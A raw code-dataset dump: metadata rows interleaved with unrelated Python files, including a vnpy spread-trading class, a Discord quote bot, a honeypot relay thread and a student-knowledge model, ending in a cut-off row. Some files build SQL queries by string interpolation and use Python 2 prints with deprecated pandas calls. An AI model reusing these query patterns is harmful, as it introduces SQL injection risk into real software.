] | 1 | 2017-10-09T06:05:11.000Z | 2017-10-09T06:05:11.000Z | vnpy/trader/app/spreadTrading/stBase.py | cmbclh/vnpy-1.7 | ccca92139198a0d213c15fe531f37c1c702ee968 | [
"MIT"
] | null | null | null | vnpy/trader/app/spreadTrading/stBase.py | cmbclh/vnpy-1.7 | ccca92139198a0d213c15fe531f37c1c702ee968 | [
"MIT"
] | null | null | null | # encoding: UTF-8
from __future__ import division
from datetime import datetime
from math import floor
import pandas as pd
import numpy as np
import sys
sys.path.append('../')
#sys.path.append('D:\\tr\\vnpy-master\\vn.trader\\DAO')
sys.path.append('D:\\tr\\vnpy-1.7\\vnpy\\DAO')
sys.path.append('D:\\tr\\vnpy-1.7\\vnpy\\common')
import vnpy.DAO
import vnpy.common
from vnpy.DAO import *
from vnpy.trader.vtConstant import (EMPTY_INT, EMPTY_FLOAT,
EMPTY_STRING, EMPTY_UNICODE)
# Event-type constants published by the spread-trading app. The trailing
# '.' on some names is presumably a prefix to which a spread name gets
# appended -- TODO confirm against the event engine usage.
EVENT_SPREADTRADING_TICK = 'eSpreadTradingTick.'
EVENT_SPREADTRADING_POS = 'eSpreadTradingPos.'
EVENT_SPREADTRADING_LOG = 'eSpreadTradingLog'
EVENT_SPREADTRADING_ALGO = 'eSpreadTradingAlgo.'
EVENT_SPREADTRADING_ALGOLOG = 'eSpreadTradingAlgoLog'
########################################################################
class StLeg(object):
    """One leg of a spread: static contract info plus live quote/position."""

    #----------------------------------------------------------------------
    def __init__(self):
        """Constructor"""
        self.vtSymbol = EMPTY_STRING    # contract symbol
        self.ratio = EMPTY_INT          # hand ratio used when actually trading
        self.multiplier = EMPTY_FLOAT   # multiplier used when pricing the spread
        self.payup = EMPTY_INT          # extra ticks paid up when hedging

        # Latest quote for this leg.
        self.bidPrice = EMPTY_FLOAT
        self.askPrice = EMPTY_FLOAT
        self.bidVolume = EMPTY_INT
        self.askVolume = EMPTY_INT

        # Current positions for this leg.
        self.longPos = EMPTY_INT
        self.shortPos = EMPTY_INT
        self.netPos = EMPTY_INT

        # P&L bookkeeping fields -- presumably mirror StSpread's active /
        # passive leg accounting; TODO confirm where these are populated.
        self.actleg = EMPTY_INT
        self.actlegPos = EMPTY_FLOAT
        self.passleg = EMPTY_INT
        self.passlegPos = EMPTY_FLOAT
        self.profitloss = EMPTY_FLOAT
########################################################################
class StSpread(object):
    """A multi-leg spread: one active leg plus any number of passive legs.

    Aggregates the legs' quotes into a spread-level bid/ask price and
    volume, aggregates leg positions into a spread position, and computes
    the floating P&L against holdings stored in the database.
    """

    #----------------------------------------------------------------------
    def __init__(self):
        """Constructor"""
        self.name = EMPTY_UNICODE       # spread name
        self.symbol = EMPTY_STRING      # spread symbol (derived from the legs)

        self.activeLeg = None           # the active leg
        self.passiveLegs = []           # passive legs (multiple supported)
        self.allLegs = []               # all legs (active leg first)

        # Spread-level quote data, refreshed by calculatePrice().
        self.bidPrice = EMPTY_FLOAT
        self.askPrice = EMPTY_FLOAT
        self.bidVolume = EMPTY_INT
        self.askVolume = EMPTY_INT
        self.time = EMPTY_STRING

        # Spread-level position data, refreshed by calculatePos().
        self.longPos = EMPTY_INT
        self.shortPos = EMPTY_INT
        self.netPos = EMPTY_INT

        # Per-side position/value of the active and passive legs, used in
        # the floating P&L computation.
        self.actlegLongPos = EMPTY_INT
        self.actlegLongValue = EMPTY_FLOAT
        self.actlegShortPos = EMPTY_INT
        self.actlegShortValue = EMPTY_FLOAT
        self.passlegLongPos = EMPTY_INT
        self.passlegLongValue = EMPTY_FLOAT
        self.passlegShortgPos = EMPTY_INT   # NOTE: 'Shortg' typo kept; name is referenced below
        self.passlegShortValue = EMPTY_FLOAT
        self.profitloss = EMPTY_FLOAT

    #----------------------------------------------------------------------
    def initSpread(self):
        """Initialize the spread: build the leg list and the spread symbol."""
        # A spread must have at least one active leg.
        if not self.activeLeg:
            return

        # Build the full leg list (active leg first).
        self.allLegs.append(self.activeLeg)
        self.allLegs.extend(self.passiveLegs)

        # Build the spread symbol, e.g. '+1.0*A-1.0*B'.
        legSymbolList = []
        for leg in self.allLegs:
            if leg.multiplier >= 0:
                legSymbol = '+%s*%s' %(leg.multiplier, leg.vtSymbol)
            else:
                legSymbol = '%s*%s' %(leg.multiplier, leg.vtSymbol)
            legSymbolList.append(legSymbol)
        self.symbol = ''.join(legSymbolList)

    #----------------------------------------------------------------------
    def calculatePrice(self):
        """Recompute spread bid/ask prices and tradable volumes from the legs."""
        # Reset price and order-volume data.
        self.bidPrice = EMPTY_FLOAT
        self.askPrice = EMPTY_FLOAT
        self.askVolume = EMPTY_INT
        self.bidVolume = EMPTY_INT

        # Walk over every leg of the spread.
        for n, leg in enumerate(self.allLegs):
            # Price: a positive multiplier contributes its own side; a
            # negative multiplier contributes the opposite side.
            if leg.multiplier > 0:
                self.bidPrice += leg.bidPrice * leg.multiplier
                self.askPrice += leg.askPrice * leg.multiplier
            else:
                self.bidPrice += leg.askPrice * leg.multiplier
                self.askPrice += leg.bidPrice * leg.multiplier

            # Volume: floor() rounds the per-leg quote volume down to whole
            # spread units.
            if leg.ratio > 0:
                legAdjustedBidVolume = floor(leg.bidVolume / leg.ratio)
                legAdjustedAskVolume = floor(leg.askVolume / leg.ratio)
            else:
                legAdjustedBidVolume = floor(leg.askVolume / abs(leg.ratio))
                legAdjustedAskVolume = floor(leg.bidVolume / abs(leg.ratio))

            if n == 0:
                self.bidVolume = legAdjustedBidVolume           # first leg: initialize directly
                self.askVolume = legAdjustedAskVolume
            else:
                self.bidVolume = min(self.bidVolume, legAdjustedBidVolume)  # later legs: tradable volume is the minimum
                self.askVolume = min(self.askVolume, legAdjustedAskVolume)

        # Update the quote timestamp.
        self.time = datetime.now().strftime('%H:%M:%S.%f')[:-3]

    #----------------------------------------------------------------------
    def calculatePos(self):
        """Recompute spread positions and floating P&L from the legs."""
        # Reset position data.
        self.longPos = EMPTY_INT
        self.shortPos = EMPTY_INT
        self.netPos = EMPTY_INT
        self.actlegLongPos = EMPTY_INT
        self.actlegLongValue = EMPTY_FLOAT
        self.actlegShortPos = EMPTY_INT
        self.actlegShortValue = EMPTY_FLOAT
        self.passlegLongPos = EMPTY_INT
        self.passlegLongValue = EMPTY_FLOAT
        self.passlegShortgPos = EMPTY_INT
        self.passlegShortValue = EMPTY_FLOAT
        self.profitloss = EMPTY_FLOAT

        # Walk over every leg of the spread.
        for n, leg in enumerate(self.allLegs):
            # A negative ratio swaps the long/short meaning for this leg.
            if leg.ratio > 0:
                legAdjustedLongPos = floor(leg.longPos / leg.ratio)
                legAdjustedShortPos = floor(leg.shortPos / leg.ratio)
            else:
                legAdjustedLongPos = floor(leg.shortPos / abs(leg.ratio))
                legAdjustedShortPos = floor(leg.longPos / abs(leg.ratio))

            if n == 0:
                self.longPos = legAdjustedLongPos
                self.shortPos = legAdjustedShortPos
            else:
                self.longPos = min(self.longPos, legAdjustedLongPos)
                self.shortPos = min(self.shortPos, legAdjustedShortPos)

            # Compute floating P&L from the database-side holdings.
            # NOTE(review): string-built SQL; leg.vtSymbol/self.name come
            # from configuration, but a parameterized query would be safer.
            sql = ' SELECT LONG_POSITION, LONG_POSITION*LONG_OPEN_AVG_PRICE,SHORT_POSITION,SHORT_POSITION*SHORT_OPEN_AVG_PRICE' \
                  ' from defer_real_hold where SYMBOL = \'%s\' and STRATAGE = \'%s\' ' % (leg.vtSymbol, self.name)
            #retPos = vnpy.DAO.getDataBySQL('vnpy', sql)
            print (u'leginfo:vtSymbol=%s,name=%s' % (leg.vtSymbol, self.name))
            retPos = vnpy.DAO.getDataBySQL('vnpy', sql)
            # The query is expected to return a single holdings row per
            # symbol/strategy; currently there is also only one passive leg.
            print retPos
            print leg
            print self.activeLeg,self.passiveLegs
            if leg == self.activeLeg:
                print (u'leginfo:self.askPrice=%s' % (str(self.askPrice)))
                # Columns: 0 = long qty, 1 = long open value,
                #          2 = short qty, 3 = short open value.
                # NOTE: DataFrame.icol() is long-deprecated pandas API.
                self.actlegLongPos = retPos.icol(0).get_values()
                self.actlegLongValue = retPos.icol(1).get_values()
                self.actlegShortPos = retPos.icol(2).get_values()
                self.actlegShortValue = retPos.icol(3).get_values()
                print self.actlegLongPos,self.actlegLongValue,self.actlegShortPos,self.actlegShortValue
            # The passive side may eventually consist of several legs, so
            # its figures are accumulated.
            elif leg in self.passiveLegs:
                self.passlegLongPos += retPos.icol(0).get_values()
                self.passlegLongValue += retPos.icol(1).get_values()
                self.passlegShortgPos += retPos.icol(2).get_values()
                self.passlegShortValue += retPos.icol(3).get_values()
            else:
                pass

            # Floating P&L = active-leg P&L + passive-leg P&L, marking longs
            # at the current ask and shorts at the current bid of this leg.
            self.profitloss = (self.actlegLongValue - self.actlegLongPos * leg.askPrice ) + (self.passlegShortValue - self.passlegShortgPos * leg.bidPrice) \
                              + (self.actlegShortValue - self.actlegShortPos * leg.bidPrice) + ( self.passlegLongValue - self.passlegLongPos * leg.askPrice)
            #self.profitloss = self.actlegLongPos*self.askPrice + self.actlegShortPos*self.bidPrice
            print (u'leginfo:self.actleg=%s,self.actlegPos=%s,self.profitloss=%s' % (str(self.actlegLongPos), str(self.actlegLongValue),str(self.profitloss)))

        # Net position of the spread.
        self.longPos = int(self.longPos)
        self.shortPos = int(self.shortPos)
        self.netPos = self.longPos - self.shortPos

        # wzhua 20170917: coerce the P&L bookkeeping fields (numpy arrays
        # returned by get_values()) back to plain scalars.
        self.actlegLongPos = int(self.actlegLongPos)
        self.actlegLongValue = float(self.actlegLongValue)
        self.actlegShortPos = int(self.actlegShortPos)
        self.actlegShortValue = float(self.actlegShortValue)
        self.passlegLongPos = int(self.passlegLongPos)
        self.passlegLongValue = float(self.passlegLongValue)
        self.passlegShortgPos = int(self.passlegShortgPos)
        self.passlegShortValue = float(self.passlegShortValue)
        self.profitloss = float(self.profitloss)

    #----------------------------------------------------------------------
    def addActiveLeg(self, leg):
        """Attach the active leg of the spread."""
        self.activeLeg = leg

    #----------------------------------------------------------------------
    def addPassiveLeg(self, leg):
        """Append a passive leg to the spread."""
        self.passiveLegs.append(leg)
| 37.270588 | 158 | 0.551557 |
abfd898f1fd7a927dd38c972caa71877640b65cc | 2,728 | py | Python | quotatron.py | ItsPonks/DiscordBots | 062c4e6b33835fc3cde391011125d4cfd7ae1c6a | [
"MIT"
] | null | null | null | quotatron.py | ItsPonks/DiscordBots | 062c4e6b33835fc3cde391011125d4cfd7ae1c6a | [
"MIT"
] | null | null | null | quotatron.py | ItsPonks/DiscordBots | 062c4e6b33835fc3cde391011125d4cfd7ae1c6a | [
"MIT"
] | null | null | null | from app import SlashBot
from async_timeout import timeout
from asyncio import TimeoutError
from datetime import datetime, timedelta, timezone
from hikari import ButtonStyle, CacheSettings, Member, UNDEFINED
from random import choice, sample, uniform
bot = SlashBot(cache_settings=CacheSettings(max_messages=10000))
async def find(context, success, failure, *members):
channel = context.get_channel()
guild = context.get_guild()
link = None
a = datetime.now(timezone.utc)
try:
async with timeout(900) as to:
content = ''
messages = set()
for i, member in enumerate(members):
predicates = [lambda m: m.content and not (m.mentions.everyone or m.mentions.role_ids or m.mentions.users) and m.content not in messages and '://' not in m.content]
attrs = dict(attachments=[], embeds=[], stickers=[])
if member:
b = max(channel.created_at, member.joined_at)
attrs['author'] = member.user
else:
b = channel.created_at
predicates.append(lambda m: not m.author.is_bot and m.author.discriminator != '0000')
until = timedelta(seconds=(to.deadline - to._loop.time()) / (len(members) - i)) + datetime.now()
while datetime.now() < until:
if history := await channel.fetch_history(around=uniform(a, b)).limit(101).filter(*predicates, **attrs):
m = choice(history)
link = m.make_link(guild)
messages.add(m)
content += success.format(username=m.author.username, content=m.content.replace('\n', ' \\ '), date=m.timestamp.date())
break
if len(content) <= 2000:
return content or failure, link
except TimeoutError:
return 'All attempts at finding quotes exceeded the maximum length.', None
@bot.slash('Randomly quotes members in this channel.')
async def convo(context, *members: ('Quote whom?', Member), count: ('How many?', int) = 5):
content, _ = await find(context, '{username}: {content}\n', 'No messages found.', *sample(members, len(members)) or [None] * min(count, 100))
await context.respond(content)
@bot.slash('Randomly quotes a member in this channel.')
async def quote(context, member: ('Quote whom?', Member) = None):
content, link = await find(context, '"{content}" -{username}, {date}', 'No message found.', member)
await context.respond(content, component=bot.button('Original', ButtonStyle.LINK, link) if link else UNDEFINED)
bot.run()
| 50.518519 | 181 | 0.606305 |
abfe2c1cf99654791bb342078effa2478f34e393 | 310 | py | Python | {{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/users/tests/test_models.py | nathfroech/cookiecutter-django | 9568671807c24655d0c51ecef91d22fe8b550d3f | [
"BSD-3-Clause"
] | null | null | null | {{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/users/tests/test_models.py | nathfroech/cookiecutter-django | 9568671807c24655d0c51ecef91d22fe8b550d3f | [
"BSD-3-Clause"
] | null | null | null | {{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/users/tests/test_models.py | nathfroech/cookiecutter-django | 9568671807c24655d0c51ecef91d22fe8b550d3f | [
"BSD-3-Clause"
] | null | null | null | import pytest
from hamcrest import assert_that, equal_to, is_
from django.conf import settings
@pytest.mark.django_db
def test_user_get_absolute_url(user: settings.AUTH_USER_MODEL):
    """The user detail URL is built from the username."""
    actual_url = user.get_absolute_url()
    assert_that(actual_url, is_(equal_to('/users/{0}/'.format(user.username))))
| 28.181818 | 69 | 0.790323 |
abfe5cbf9100c74ccd8fce63d1076b3d06dffdca | 93 | py | Python | protocols/apps.py | OhEvolve/LabBio | 4495f70ea544e0c7208d51abcb1469adcb84fc1b | [
"MIT"
] | null | null | null | protocols/apps.py | OhEvolve/LabBio | 4495f70ea544e0c7208d51abcb1469adcb84fc1b | [
"MIT"
] | null | null | null | protocols/apps.py | OhEvolve/LabBio | 4495f70ea544e0c7208d51abcb1469adcb84fc1b | [
"MIT"
] | null | null | null | from django.apps import AppConfig
class ProtocolsConfig(AppConfig):
    """Django application configuration for the `protocols` app."""
    name = 'protocols'
| 15.5 | 33 | 0.763441 |
abff8a668f2d6433edc42fc8d0de063e6d1e1a69 | 2,745 | py | Python | hpotter/src/one_way_thread.py | LarsenClose/dr.hpotter | ef6199ab563a92f3e4916277dbde9217126f36a9 | [
"MIT"
] | 1 | 2021-08-15T09:24:20.000Z | 2021-08-15T09:24:20.000Z | hpotter/src/one_way_thread.py | LarsenClose/dr.hpotter | ef6199ab563a92f3e4916277dbde9217126f36a9 | [
"MIT"
] | 18 | 2021-02-01T21:58:20.000Z | 2021-05-24T17:10:25.000Z | hpotter/src/one_way_thread.py | LarsenClose/dr.hpotter | ef6199ab563a92f3e4916277dbde9217126f36a9 | [
"MIT"
] | 1 | 2021-06-19T12:49:54.000Z | 2021-06-19T12:49:54.000Z | ''' Threads that go to/from containers, limit data and lines, and insert
data into the Data table. '''
import threading
from src import tables
from src.logger import logger
from src.lazy_init import lazy_init
class OneWayThread(threading.Thread):
    ''' One thread to/from container. '''
    # Attributes like self.source, self.dest, self.container, self.direction
    # are injected by the @lazy_init decorator from the __init__ arguments,
    # hence the pylint suppressions.
    # pylint: disable=E1101, W0613
    @lazy_init
    def __init__(self, source, dest, connection, container, direction, database):
        super().__init__()
        # Per-direction limits, configurable through the container dict.
        self.length = self.container.get(self.direction + '_length', 4096)
        self.commands = self.container.get(self.direction + '_commands', 10)
        self.delimiters = self.container.get(self.direction + '_delimiters', ['\n', '\r'])
        self.shutdown_requested = False
    def _read(self):
        ''' Read one chunk (up to 4096 bytes) from the source socket. '''
        logger.debug('%s reading from: %s', self.direction, str(self.source))
        data = self.source.recv(4096)
        logger.debug('%s read: %s', self.direction, str(data))
        return data
    def _write(self, data):
        ''' Forward one chunk to the destination socket. '''
        logger.debug('%s sending to: %s', self.direction, str(self.dest))
        self.dest.sendall(data)
        logger.debug('%s sent: %s', self.direction, str(data))
    def _too_many_commands(self, data):
        ''' True when the chunk holds >= self.commands delimited commands;
        a non-positive self.commands disables the check. '''
        if self.commands > 0:
            sdata = str(data)
            count = 0
            for delimiter in self.delimiters:
                count = max(count, sdata.count(delimiter))
            if count >= self.commands:
                logger.info('Commands exceeded, stopping')
                return True
        return False
    def run(self):
        ''' Pump data source -> dest until EOF, error, shutdown request, or
        a length/command limit trips, then optionally persist the capture. '''
        total = b''
        while True:
            try:
                data = self._read()
                if not data or data == b'':
                    break
                self._write(data)
            except Exception as exception:
                # Socket errors simply end the pump; logged at debug level.
                logger.debug('%s %s', self.direction, str(exception))
                break
            total += data
            if self.shutdown_requested:
                break
            if self.length > 0 and len(total) >= self.length:
                logger.debug('Length exceeded')
                break
            if self._too_many_commands(data):
                break
        logger.debug(self.length)
        logger.debug(len(total))
        logger.debug(self.direction)
        # Persist only when the container opts in and something was captured.
        save = self.direction + '_save'
        if (save in self.container and self.container[save]) and (self.length > 0 and len(total) > 0):
            self.database.write(tables.Data(direction=self.direction,
            data=str(total), connection=self.connection))
        self.source.close()
        self.dest.close()
    def shutdown(self):
        ''' Called from external source when HPotter shutting down. '''
        self.shutdown_requested = True
| 33.072289 | 102 | 0.579964 |
abffd96161e8443437fe3910d4ce59e8abc42d99 | 731 | py | Python | tests/_test_version_greater.py | jonyboi396825/COM-Server | e4e8a1a5e9f86c1036ebb7ac3d39c20b63e7e905 | [
"MIT"
] | 4 | 2021-11-09T04:11:51.000Z | 2022-01-30T01:03:16.000Z | tests/_test_version_greater.py | jonyboi396825/COM-Server | e4e8a1a5e9f86c1036ebb7ac3d39c20b63e7e905 | [
"MIT"
] | 55 | 2021-11-15T16:36:25.000Z | 2022-03-10T04:48:08.000Z | tests/_test_version_greater.py | jonyboi396825/COM-Server | e4e8a1a5e9f86c1036ebb7ac3d39c20b63e7e905 | [
"MIT"
] | 1 | 2021-11-12T02:14:07.000Z | 2021-11-12T02:14:07.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Version testing
Don't want to run when running `pytest`, only run when something
is pushed to develop branch or PR to master.
"""
import configparser
import requests
from com_server import __version__
from passive.cmp_version import Version
def test_version_greater() -> None:
    """Assert the local version exceeds the one on the GitHub master branch."""
    response = requests.get(
        "https://raw.githubusercontent.com/jonyboi396825/COM-Server/master/setup.cfg"
    )
    parser = configparser.ConfigParser()
    parser.read_string(response.text)
    master_version = Version(parser["metadata"]["version"])
    assert Version(__version__) > master_version
| 23.580645 | 85 | 0.719562 |
2800fe4ff8f5543c36554bc37b647db2a125d9ae | 390 | py | Python | mp/visualize/models.py | Ecotrust/PEW-EFH | 83e404fe90e957891ab2dfaad327e52346cea748 | [
"Apache-2.0"
] | 1 | 2017-09-06T14:05:48.000Z | 2017-09-06T14:05:48.000Z | mp/visualize/models.py | Ecotrust/PEW-EFH | 83e404fe90e957891ab2dfaad327e52346cea748 | [
"Apache-2.0"
] | 126 | 2015-01-05T19:47:52.000Z | 2021-09-07T23:44:29.000Z | mp/visualize/models.py | Ecotrust/COMPASS | 42ee113e4d66767300cfab0d6ce1f35847f447ed | [
"Apache-2.0"
] | null | null | null | from django.db import models
from django.conf import settings
from django.contrib.gis.db import models
from madrona.features import register
from madrona.features.models import Feature
@register
class Bookmark(Feature):
    """Madrona feature storing a bookmarked map view as a URL hash."""
    url_hash = models.CharField(max_length=2050)
    class Options:
        # Madrona feature options: display name and edit form.
        verbose_name = 'Marine Planner Bookmark'
form = 'visualize.forms.BookmarkForm' | 27.857143 | 49 | 0.761538 |
2804d5dc2b4f1fcfefbc0acd3532b59ffc96d9f6 | 1,827 | py | Python | util/levels.py | Xetera/IreneBot | e768bb3a0d2517ecb00d50da89d66ac0dd1498d0 | [
"MIT"
] | 1 | 2021-10-02T16:05:11.000Z | 2021-10-02T16:05:11.000Z | util/levels.py | Xetera/IreneBot | e768bb3a0d2517ecb00d50da89d66ac0dd1498d0 | [
"MIT"
] | null | null | null | util/levels.py | Xetera/IreneBot | e768bb3a0d2517ecb00d50da89d66ac0dd1498d0 | [
"MIT"
] | null | null | null | from Utility import resources as ex
# noinspection PyPep8
class Levels:
@staticmethod
async def get_level(user_id, command):
"""Get the level of a command (rob/beg/daily)."""
count = ex.first_result(
await ex.conn.fetchrow(f"SELECT COUNT(*) FROM currency.Levels WHERE UserID = $1 AND {command} > $2",
user_id, 1))
if not count:
level = 1
else:
level = ex.first_result(
await ex.conn.fetchrow(f"SELECT {command} FROM currency.Levels WHERE UserID = $1", user_id))
return int(level)
@staticmethod
async def set_level(user_id, level, command):
"""Set the level of a user for a specific command."""
async def update_level():
"""Updates a user's level."""
await ex.conn.execute(f"UPDATE currency.Levels SET {command} = $1 WHERE UserID = $2", level, user_id)
count = ex.first_result(await ex.conn.fetchrow(f"SELECT COUNT(*) FROM currency.Levels WHERE UserID = $1", user_id))
if not count:
await ex.conn.execute("INSERT INTO currency.Levels VALUES($1, NULL, NULL, NULL, NULL, 1)", user_id)
await update_level()
else:
await update_level()
@staticmethod
async def get_xp(level, command):
"""Returns money/experience needed for a certain level."""
if command == "profile":
return 250 * level
return int((2 * 350) * (2 ** (level - 2))) # 350 is base value (level 1)
@staticmethod
async def get_rob_percentage(level):
"""Get the percentage of being able to rob. (Every 1 is 5%)"""
chance = int(6 + (level // 10)) # first 10 levels is 6 for 30% chance
if chance > 16:
chance = 16
return chance
| 38.87234 | 123 | 0.586207 |
2806153fe5679750056acfcdb852bf9fdff951e3 | 374 | py | Python | src/python_pachyderm/experimental/mixin/__init__.py | sjezewski/pypachy | 4bc022d0c73140475f9bd0acd5c0e7204609de26 | [
"Apache-2.0"
] | 2 | 2017-02-01T14:22:34.000Z | 2017-02-01T19:58:54.000Z | src/python_pachyderm/experimental/mixin/__init__.py | sjezewski/pypachy | 4bc022d0c73140475f9bd0acd5c0e7204609de26 | [
"Apache-2.0"
] | 3 | 2018-02-13T20:40:59.000Z | 2018-02-13T22:23:41.000Z | src/python_pachyderm/experimental/mixin/__init__.py | sjezewski/pypachy | 4bc022d0c73140475f9bd0acd5c0e7204609de26 | [
"Apache-2.0"
] | null | null | null | """
Exposes an experimental mixin for each pachyderm service. These mixins should
not be used directly; instead, you should use
``python_pachyderm.experimental.Client()``. The mixins exist exclusively in
order to provide better code organization, because we have several mixins,
rather than one giant
:class:`Client <python_pachyderm.experimental.client.Client>` class.
"""
| 41.555556 | 77 | 0.799465 |
f9eaf3d0c02077230ba993a6dcd5aeadb2b3f5df | 1,533 | py | Python | Hydraslayer/Utility.py | Jorisvansteenbrugge/GapFiller | ff879935765ed47eafcc0f38e47042694657d961 | [
"MIT"
] | null | null | null | Hydraslayer/Utility.py | Jorisvansteenbrugge/GapFiller | ff879935765ed47eafcc0f38e47042694657d961 | [
"MIT"
] | null | null | null | Hydraslayer/Utility.py | Jorisvansteenbrugge/GapFiller | ff879935765ed47eafcc0f38e47042694657d961 | [
"MIT"
] | null | null | null | import logging
logger = logging.getLogger("Hydraslayer")
def get_consensusbase(bases, mincov=3):
"""
:param mincov:
:type bases: list
"""
bases = "".join(bases)
a = bases.count('A')
t = bases.count('T')
c = bases.count('C')
g = bases.count('G')
n = bases.count("N") + bases.count('-')
counts = [(a, 'A'), (t, 'T'), (c, 'C'), (g, 'G')]
s_dic = sorted(counts, key=lambda x: x[0], reverse=True)
max = s_dic[0]
if max[0] < mincov:
return "N"
else:
return max[1]
def get_gap_pos_alignment(record):
sequence = str(record.seq)
N_pos = [x for x, nuc in enumerate(sequence) if nuc == "N"]
return N_pos
def extract_positions(seq, positions):
return "".join([seq[idx] for idx in positions])
def pretty_print_alignment(fasta_sequences):
alignment_len = len(fasta_sequences[0])
for x in range(alignment_len):
row = []
for alignment in fasta_sequences:
row.append(alignment[x])
print(" ".join(row))
def get_consensus(fasta_seqs, mincov):
"""Get the per-position consensus sequence, excluding gaps.
All read sequences (not the assembly sequence) are merged into a consensus sequence.
"""
consensus = []
alignment_len = len(fasta_seqs[0])
for x in range(alignment_len):
bases = [fasta[x] for fasta in fasta_seqs]
consensus.append(get_consensusbase(bases, mincov))
# logger.debug(f'Consensus {"".join(consensus)}')
return "".join(consensus)
| 23.227273 | 92 | 0.613177 |
f9eb5ae0a2f921af7f1e7867be9f3e3a70e3a5d2 | 5,094 | py | Python | src/student/student_model.py | YoshikiKubotani/RLTutor | 17d7cd274d0ea5ef69a4590b01ab905a4ed58463 | [
"MIT"
] | 3 | 2021-08-10T09:57:42.000Z | 2022-03-10T12:52:56.000Z | src/student/student_model.py | YoshikiKubotani/rltutor | 17d7cd274d0ea5ef69a4590b01ab905a4ed58463 | [
"MIT"
] | 1 | 2021-04-17T03:35:33.000Z | 2021-04-23T15:58:02.000Z | src/student/student_model.py | YoshikiKubotani/rltutor | 17d7cd274d0ea5ef69a4590b01ab905a4ed58463 | [
"MIT"
] | null | null | null | import copy
import numpy as np
from collections import defaultdict
import utils
class DAS3HStudent:
def __init__(self, time_weight, n_items, n_skills, seed):
np.random.seed(seed)
self.alpha = np.random.normal(loc=-1.5, scale=0.3, size=1)
self.delta = np.random.normal(loc=-1.0, scale=0.5, size=n_items)
self.beta = np.random.normal(loc=-1.0, scale=0.5, size=n_skills)
self.time_weight = time_weight
self.weight = np.hstack((self.delta, self.beta, self.time_weight))
self.h = 0.3
self.d = 0.8
def predict_proba(self, input_sparse_vec, lag):
for_sigmoid = self.alpha + np.dot(self.weight, input_sparse_vec)
ret = 1 / (1 + np.exp(-for_sigmoid)[0])
ret = (1 - ret) * (1 + self.h * lag) ** (-self.d) + ret
return ret
class StudentModel(object):
def __init__(
self, n_items, n_skills, n_wins, seed, item_skill_mat, model
):
self.name = "DAS3H"
np.random.seed(seed)
self.n_items = n_items
self.n_skills = n_skills
self.n_wins = n_wins
self.predictor = model
self.item_skill_mat = item_skill_mat
self.n_item_feats = int(np.log(2 * self.n_items))
self.item_feats = np.random.normal(
np.zeros(2 * self.n_items * self.n_item_feats),
np.ones(2 * self.n_items * self.n_item_feats),
).reshape((2 * self.n_items, self.n_item_feats))
self.now = 0
self.last_time = defaultdict(lambda: -10)
self.curr_item = np.random.randint(self.n_items)
self.q = defaultdict(lambda: utils.OurQueue())
self.curr_outcome = 0
self.curr_delay = 0
self.skill_ids = None
def _make_input_vec(self, selected_item_id, now_q):
item_vec = np.zeros(self.n_items)
skill_vec = np.zeros(self.n_skills)
correct_vec = np.zeros(self.n_wins * self.n_skills)
attempt_vec = np.zeros(self.n_wins * self.n_skills)
item_vec[selected_item_id] = 1
index_of_selected_skills = np.argwhere(
self.item_skill_mat[selected_item_id] == 1
)
self.skill_ids = index_of_selected_skills.transpose()[0].tolist()
self.skill_ids = list(set(self.skill_ids))
skill_vec[self.skill_ids] = 1
for skill_id in self.skill_ids:
correct_vec[skill_id * self.n_wins : (skill_id + 1) * self.n_wins] = np.log(
1 + np.array(now_q[skill_id, "correct"].get_counters(self.now))
)
attempt_vec[skill_id * self.n_wins : (skill_id + 1) * self.n_wins] = np.log(
1 + np.array(now_q[skill_id].get_counters(self.now))
)
return_np_vec = np.hstack((item_vec, skill_vec, correct_vec, attempt_vec))
return return_np_vec
def _encode_delay(self):
v = np.zeros(2)
v[self.curr_outcome] = np.log(1 + self.curr_delay)
return v
def _encode_delay2(self):
v = np.zeros(2)
delay = self.curr_delay
if len(self.q.queue) != 0:
delay = self.now - self.q.queue[-1]
v[self.curr_outcome] = np.log(1 + delay)
return v
def _vectorized_obs(self):
encoded_item = self.item_feats[
self.n_items * self.curr_outcome + self.curr_item, :
]
return np.hstack(
(encoded_item, self._encode_delay(), np.array([self.curr_outcome]))
)
def step(self, action, now):
self.curr_item = action
self.curr_delay = now - self.now
self.now += self.curr_delay
input_vec = self._make_input_vec(self.curr_item, copy.deepcopy(self.q))
lag = self.now - self.last_time[self.curr_item]
recall_prob = self.predictor.predict_proba(input_vec, lag)
self.curr_outcome = 1 if np.random.random() < recall_prob else 0
self._update_model()
obs = self._vectorized_obs()
return self.curr_outcome, obs
def _update_model(self):
self.last_time[self.curr_item] = self.now
for skill_id in self.skill_ids:
_ = self.q[skill_id, "correct"].get_counters(self.now)
_ = self.q[skill_id].get_counters(self.now)
if self.curr_outcome == 1:
self.q[skill_id, "correct"].push(self.now)
self.q[skill_id].push(self.now)
def get_retention_rate(self):
retention_rate_list = []
curr_q = copy.deepcopy(self.q)
for item in range(self.n_items):
input_vec = self._make_input_vec(item, curr_q)
lag = self.now - self.last_time[item]
recall_prob = self.predictor.predict_proba(input_vec, lag)
retention_rate_list.append(recall_prob)
return retention_rate_list
def reset(self, seed):
np.random.seed(seed)
self.now = 0
self.last_time = defaultdict(lambda: -10)
self.curr_item = np.random.randint(self.n_items)
self.q = defaultdict(lambda: utils.OurQueue())
self.curr_outcome = 0
self.curr_delay = 0
self.skill_ids = None | 35.622378 | 88 | 0.611504 |
f9ee55d442bf6d3dde7fbd268f409bf967f59adc | 163 | py | Python | Dataset/Leetcode/train/125/374.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/train/125/374.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/train/125/374.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | class Solution:
'''第九题'''
def XXX(self, s: str) -> bool:
s = ''.join([i.lower() for i in s if i.strip().isalnum()])
return s == s[::-1]
| 20.375 | 66 | 0.466258 |
f9eebbfc0db7d11ed30b9b7cf32f005e8751ccbd | 39 | py | Python | lang/Python/singly-linked-list-traversal-1.py | ethansaxenian/RosettaDecode | 8ea1a42a5f792280b50193ad47545d14ee371fb7 | [
"MIT"
